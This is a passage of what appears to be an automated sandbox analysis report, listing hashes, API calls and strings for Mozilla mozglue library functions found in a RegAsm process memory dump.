                                                                                      • Opcode ID: a5964e8c05954e8a41727960af9d8a226ba2a40dc92d92ee8e34d1ba488d40de
                                                                                      • Instruction ID: ec675e419ed038e6023c316cea1c15d4df3d4e96972b24fec90015a317ae74ee
                                                                                      • Opcode Fuzzy Hash: a5964e8c05954e8a41727960af9d8a226ba2a40dc92d92ee8e34d1ba488d40de
                                                                                      • Instruction Fuzzy Hash: 08312331A01628DBCB00DFA9D880AAEB7B5BF0430CF541529D84A67A41E731E949CBA1
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(shell32,?,6C15D020), ref: 6C0EF122
                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C0EF132
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressLibraryLoadProc
                                                                                      • String ID: SHGetKnownFolderPath$shell32
                                                                                      • API String ID: 2574300362-1045111711
                                                                                      • Opcode ID: 172f60a9c707c0881a745eda70ba3d62b0ed3152af9805ba1077bfdfda552acf
                                                                                      • Instruction ID: 57c6a23f4d6afbde24894408d4afa7daaf40d9c000437f08518db23071efa474
                                                                                      • Opcode Fuzzy Hash: 172f60a9c707c0881a745eda70ba3d62b0ed3152af9805ba1077bfdfda552acf
                                                                                      • Instruction Fuzzy Hash: 8F0148717002199FCB009F6AEC48AAABBF8FF4A754B404529E849E7640D730AA00DBA0
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12E577
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E584
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E5DE
                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C12E8A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                      • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                      • API String ID: 1483687287-53385798
                                                                                      • Opcode ID: c92fb3f0fb24f2e335591f4341b966aba1bd4229b0467e1dfa280ee04f69af2d
                                                                                      • Instruction ID: daa00bfdb145d7fd48336ae4da9566d92d68485dc0d0ccbe4b33335861df262b
                                                                                      • Opcode Fuzzy Hash: c92fb3f0fb24f2e335591f4341b966aba1bd4229b0467e1dfa280ee04f69af2d
                                                                                      • Instruction Fuzzy Hash: D511A136604258DFCB009F2AC848B69BBB4FF89328F000619F89557F50C774A955DB91
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C0F237F
                                                                                      • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C0F2B9C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID:
                                                                                      • API String ID: 3510742995-0
                                                                                      • Opcode ID: d3557f20ed44567ee482a6fedba069a6a6ab2446fa78d294d763f470b7b423f2
                                                                                      • Instruction ID: 78a8057655505345b707fb50ff66a02b846fde875b203d66a089469b42ec9924
                                                                                      • Opcode Fuzzy Hash: d3557f20ed44567ee482a6fedba069a6a6ab2446fa78d294d763f470b7b423f2
                                                                                      • Instruction Fuzzy Hash: 3EE159B1A002469FDB08CF59C894B9EBBF2BF88314F198168ED195B745D771E8C6CB90
                                                                                      APIs
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C130CD5
                                                                                        • Part of subcall function 6C11F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C11F9A7
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C130D40
                                                                                      • free.MOZGLUE ref: 6C130DCB
                                                                                        • Part of subcall function 6C105E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C105EDB
                                                                                        • Part of subcall function 6C105E90: memset.VCRUNTIME140(6C147765,000000E5,55CCCCCC), ref: 6C105F27
                                                                                        • Part of subcall function 6C105E90: LeaveCriticalSection.KERNEL32(?), ref: 6C105FB2
                                                                                      • free.MOZGLUE ref: 6C130DDD
                                                                                      • free.MOZGLUE ref: 6C130DF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                      • String ID:
                                                                                      • API String ID: 4069420150-0
                                                                                      • Opcode ID: 76993fba11f86f43dbd15568cf824465fba9240bcf7d48fb1187d1696c444aea
                                                                                      • Instruction ID: 93bb78be8fa200dde25309b0ef771ef1d902438a478f3314f8df584105726364
                                                                                      • Opcode Fuzzy Hash: 76993fba11f86f43dbd15568cf824465fba9240bcf7d48fb1187d1696c444aea
                                                                                      • Instruction Fuzzy Hash: 0D413B71A187948BD320CF29C04079AFBE5BFD9718F519A2EE8DC87B50D7709484CB82
                                                                                      APIs
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C138242,?,00000000,?,6C12B63F), ref: 6C139188
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C138242,?,00000000,?,6C12B63F), ref: 6C1391BB
                                                                                      • memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6C138242,?,00000000,?,6C12B63F), ref: 6C1391EB
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C138242,?,00000000,?,6C12B63F), ref: 6C139200
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C138242,?,00000000,?,6C12B63F), ref: 6C139219
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: malloc$freememcpy
                                                                                      • String ID:
                                                                                      • API String ID: 4259248891-0
                                                                                      • Opcode ID: 2a856293671a459f7d6b718a8017dad74f28a0127355d7a7919a9d0a4485dd50
                                                                                      • Instruction ID: 718af81582bee095252e2b1d6eee4d4500f118da3757b718e1a01ad0f31c7754
                                                                                      • Opcode Fuzzy Hash: 2a856293671a459f7d6b718a8017dad74f28a0127355d7a7919a9d0a4485dd50
                                                                                      • Instruction Fuzzy Hash: A1314771A00A158FEB10DF6CDC9476A73E5EF91318F514639D89AD7640EF31D818CBA1
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(6C16E7DC), ref: 6C120838
                                                                                      • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C12084C
                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C1208AF
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C1208BD
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E7DC), ref: 6C1208D5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeave$memset
                                                                                      • String ID:
                                                                                      • API String ID: 837921583-0
                                                                                      • Opcode ID: 52a6031c6819ab01ab7943b3718e060856a71ef2519417197e3bb67e79c702aa
                                                                                      • Instruction ID: 22b446721a5a88e0a5a25b91094f37203f1c2ea3b747e3ca0f906da847cbb5de
                                                                                      • Opcode Fuzzy Hash: 52a6031c6819ab01ab7943b3718e060856a71ef2519417197e3bb67e79c702aa
                                                                                      • Instruction Fuzzy Hash: FC21B035B012498BEB048F66DC54BBBB779EF45708F500628E509A7B40DB3AA9648BD0
                                                                                      APIs
                                                                                      • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C12DA31,00100000,?,?,00000000,?), ref: 6C13CDA4
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                        • Part of subcall function 6C13D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C13CDBA,00100000,?,00000000,?,6C12DA31,00100000,?,?,00000000,?), ref: 6C13D158
                                                                                        • Part of subcall function 6C13D130: InitializeConditionVariable.KERNEL32(00000098,?,6C13CDBA,00100000,?,00000000,?,6C12DA31,00100000,?,?,00000000,?), ref: 6C13D177
                                                                                      • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C12DA31,00100000,?,?,00000000,?), ref: 6C13CDC4
                                                                                        • Part of subcall function 6C137480: ReleaseSRWLockExclusive.KERNEL32(?,6C1415FC,?,?,?,?,6C1415FC,?), ref: 6C1374EB
                                                                                      • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C12DA31,00100000,?,?,00000000,?), ref: 6C13CECC
                                                                                        • Part of subcall function 6C0FCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0FCAA2
                                                                                        • Part of subcall function 6C12CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C13CEEA,?,?,?,?,00000000,?,6C12DA31,00100000,?,?,00000000), ref: 6C12CB57
                                                                                        • Part of subcall function 6C12CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C12CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C13CEEA,?,?), ref: 6C12CBAF
                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C12DA31,00100000,?,?,00000000,?), ref: 6C13D058
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                      • String ID:
                                                                                      • API String ID: 861561044-0
                                                                                      • Opcode ID: 87ac81be03b24f2703ec48bd0ca92c35a0a3742d354f2f43326defba4528b54b
                                                                                      • Instruction ID: 76a90cda116c8295bb22887ffea5cc326923ae13f871970a0c96738071ce7d90
                                                                                      • Opcode Fuzzy Hash: 87ac81be03b24f2703ec48bd0ca92c35a0a3742d354f2f43326defba4528b54b
                                                                                      • Instruction Fuzzy Hash: 3FD19E71A04B169FD708DF28C490B99F7E1BF89308F01876DD9598B712EB31E9A5CB81
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C0F17B2
                                                                                      • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C0F18EE
                                                                                      • free.MOZGLUE(?), ref: 6C0F1911
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0F194C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                                      • String ID:
                                                                                      • API String ID: 3725304770-0
                                                                                      • Opcode ID: 67bb341639833b9da346cf0a2b0b514296a87c3010f9ca696fb76d3db8b9f5ab
                                                                                      • Instruction ID: ddf00df093d2b24c4ec5901156d0d7e883331c17a0d56b3c5e223863b83581a2
                                                                                      • Opcode Fuzzy Hash: 67bb341639833b9da346cf0a2b0b514296a87c3010f9ca696fb76d3db8b9f5ab
                                                                                      • Instruction Fuzzy Hash: C881C7B0A153099FCB08CF68D8946AEBBF1FF89314F04452CE825A7754D730E996CBA1
                                                                                      APIs
                                                                                      • GetTickCount64.KERNEL32 ref: 6C105D40
                                                                                      • EnterCriticalSection.KERNEL32(6C16F688), ref: 6C105D67
                                                                                      • __aulldiv.LIBCMT ref: 6C105DB4
                                                                                      • LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C105DED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                      • String ID:
                                                                                      • API String ID: 557828605-0
                                                                                      • Opcode ID: 7ebd9fc157d3dd810806ab9bb776c873c2c174c1798a716536ae264028c222cd
                                                                                      • Instruction ID: 0e2757f32934297296d4c80f47c08720bd4d127e8500f45ec1b2db86e24bee77
                                                                                      • Opcode Fuzzy Hash: 7ebd9fc157d3dd810806ab9bb776c873c2c174c1798a716536ae264028c222cd
                                                                                      • Instruction Fuzzy Hash: 19513D71F001198FDF08CF69C954BBEBBB2FB85304F1A862AD865A7750DB706946CB90
                                                                                      APIs
                                                                                      • GetTickCount64.KERNEL32 ref: 6C147250
                                                                                      • EnterCriticalSection.KERNEL32(6C16F688), ref: 6C147277
                                                                                      • __aulldiv.LIBCMT ref: 6C1472C4
                                                                                      • LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C1472F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                      • String ID:
                                                                                      • API String ID: 557828605-0
                                                                                      • Opcode ID: 8b9e16d024be8432316524a1d63614e6665eaed268da9e2848bf86a9af23d471
                                                                                      • Instruction ID: a35e366fcaf216b00c10f15af21fab27376f76d55caf1c67371fd4df6c5d41ca
                                                                                      • Opcode Fuzzy Hash: 8b9e16d024be8432316524a1d63614e6665eaed268da9e2848bf86a9af23d471
                                                                                      • Instruction Fuzzy Hash: 25514C71E001298FCF08CFA9C951BBEBBB2FB89314F15862AD825A7750D7316946DBD0
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0ECEBD
                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C0ECEF5
                                                                                      • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C0ECF4E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memset
                                                                                      • String ID: 0
                                                                                      • API String ID: 438689982-4108050209
                                                                                      • Opcode ID: 913da50ca6b01e928e1dac8edfbaeb9b25d92fc86e665d8dbfd90c2a7356e8f2
                                                                                      • Instruction ID: 853449c030532bef622ad613b543a10218f669f52f0ce2ec7c026c40e3adbfa4
                                                                                      • Opcode Fuzzy Hash: 913da50ca6b01e928e1dac8edfbaeb9b25d92fc86e665d8dbfd90c2a7356e8f2
                                                                                      • Instruction Fuzzy Hash: 8A51F275A0025A8FCB04CF18C890BAAFBE5EF99300F198599D8595F352D732ED06CBE0
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12E3E4
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E3F1
                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C12E4AB
                                                                                        • Part of subcall function 6C0F5D40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,?,6C12D2DA,00000001), ref: 6C0F5D66
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E4F5
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12E577
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E584
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E5DE
                                                                                      • memset.VCRUNTIME140(?,00000000,00000000), ref: 6C12E6DA
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C12E864
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C12E883
                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C12E8A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreememset$Xbad_function_call@std@@malloc
                                                                                      • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                      • API String ID: 905598890-53385798
                                                                                      • Opcode ID: 0d38b6d54d8842564ad414ac595646cf6cad6f052418f987f70bd92e6acf1802
                                                                                      • Instruction ID: da36079fece0bdeb61c647e198d32c39686d4505cef5185ad700c7f211bcc5ed
                                                                                      • Opcode Fuzzy Hash: 0d38b6d54d8842564ad414ac595646cf6cad6f052418f987f70bd92e6acf1802
                                                                                      • Instruction Fuzzy Hash: F1419C78A00646CFCB14CF29C494BAAB7B1FF4A309F10412DD9669BB81D734A995CBD0
                                                                                      APIs
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1477FA
                                                                                      • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C147829
                                                                                        • Part of subcall function 6C11CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C0E31A7), ref: 6C11CC45
                                                                                        • Part of subcall function 6C11CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C0E31A7), ref: 6C11CC4E
                                                                                      • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C14789F
                                                                                      • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C1478CF
                                                                                        • Part of subcall function 6C0E4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C0E4E5A
                                                                                        • Part of subcall function 6C0E4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C0E4E97
                                                                                        • Part of subcall function 6C0E4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C123EBD,6C123EBD,00000000), ref: 6C0E42A9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                                      • String ID:
                                                                                      • API String ID: 2525797420-0
                                                                                      • Opcode ID: 26308fd0f61f85439a630f1c01a47c06b48305f75ee19a4afbc48722af1d971c
                                                                                      • Instruction ID: e886ba9edca492f0b5e5e3349bb5a2896133dcd9aae1297b2b98cff580839132
                                                                                      • Opcode Fuzzy Hash: 26308fd0f61f85439a630f1c01a47c06b48305f75ee19a4afbc48722af1d971c
                                                                                      • Instruction Fuzzy Hash: 7D415C719087469BD300DF29D48056AFBE4FF8A254F604A2EE4A987640DB70E559CBD2
                                                                                      APIs
                                                                                      • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C13DB86
                                                                                      • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C13DC0E
                                                                                      • free.MOZGLUE(?), ref: 6C13DC2E
                                                                                      • free.MOZGLUE(?), ref: 6C13DC40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Impl@detail@mozilla@@Mutexfree
                                                                                      • String ID:
                                                                                      • API String ID: 3186548839-0
                                                                                      • Opcode ID: e7f10fd2a23b4beefcba04cfcc7f04bcea4e0152ba26d9af16d954e80391790c
                                                                                      • Instruction ID: 31aedb039f27e3832d078c6913f048e76c19eb4fd4a2c23d8d35870ca0b1dd01
